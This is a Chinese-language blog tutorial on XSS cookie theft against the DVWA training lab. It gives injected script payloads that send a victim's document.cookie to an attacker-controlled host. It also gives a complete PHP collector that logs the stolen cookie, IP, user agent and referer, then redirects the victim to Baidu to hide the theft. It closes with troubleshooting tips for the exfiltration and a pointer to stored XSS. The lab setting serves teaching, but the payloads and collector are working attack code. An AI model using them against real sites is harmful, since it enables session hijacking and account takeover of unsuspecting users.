记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

XSS跨站脚本攻击入门实例--DVWA

2013-04-06 16:15
一、窃取Cookie 

     对于跨站的攻击方法,使用最多的莫过于cookie窃取了,获取cookie后直接借助“Live http headers、Tamper Data、Gressmonkey (Cookie injector)、Fiddler”等等工具将cookie修改为获取的cookie,这样即可获得权限。成功还有必要因素(同源策略+浏览器+form标签表单)

首先,我们在DVWA搭建下http://192.168.0.5/dvwa/vulnerabilities/xss_r/

图一 

head代码模块中写入:发send(其实是跳转,转移cookie)

<script>document.write('<img src="http://localhost/test.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script>

或者

<script>document.location = 'http://localhost/test.php?cookie=' + document.cookie;</script>

以上两个均可达到同等效果,但就隐蔽性而言,前者的隐蔽性会更强些,读 者可自行选择,当然也有其它语句可达到一样的目的,就看你如何发挥了。

图二

        这里我把脚本放在Bt5上,Bt5地址:192.168.0.5。测试机XP:192.168.0.103     XP机登陆DVWA环境

        接下来我们来编写上面的Accept_cookie.php(收cookie)文件,它主要用于获取对方的cookie, 其源代码如下:

<?php

$cookie = $_GET['cookie']; //以GET方式获取cookie变量值
$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址
$time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间
$referer=getenv ('HTTP_REFERER'); //链接来源
$agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型

$fp = fopen('cookie.txt', 'a'); //打开cookie.txt,若不存在则创建它
fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //写入文件
fclose($fp); //关闭文件

header("Location: http://www.baidu.com"); //将网页重定向到百度,增强隐蔽性

?>

文件所处目录:

1、执行图二,在框中输入<script>document.write('<img src="http://192.168.0.5/Accept_cookie.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');alert(/XSS/)</script> 

2、点击Submit。

3、在Bt5下查看结果http://localhost/cookie.txt。cookiet位于Accept_cookie.php同目录下。看看cookie.txt 文件是否被创建并写入数据,结果如图3所示:

很明显,我们已经成功窃取到cookie了,剩下的事相信大家都知道。。。

cookie.txt没有Referer的几点原因:

1.1地址前没有加入“http://”跳转           1.2‘+document.cookie+’ 中没有加“++”号

1.3 unicode编码加解密过程编码差异     1.4Accep_cookie.php 后缀点前面多出一空格

深入一点可以在http://192.168.0.5/dvwa/vulnerabilities/xss_s/ 页面进行以上操作。存储型XSS...

举个例子说明:DVWA-XSS漏洞利用窃取cookie:http://www.hackdig.com/Article/201110/108697.html

知识来源: www.2cto.com/Article/201304/200543.html

阅读:343124 | 评论:0 | 标签:xss 跨站

想收藏或者和大家分享这篇好文章→复制链接地址

“XSS跨站脚本攻击入门实例--DVWA”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云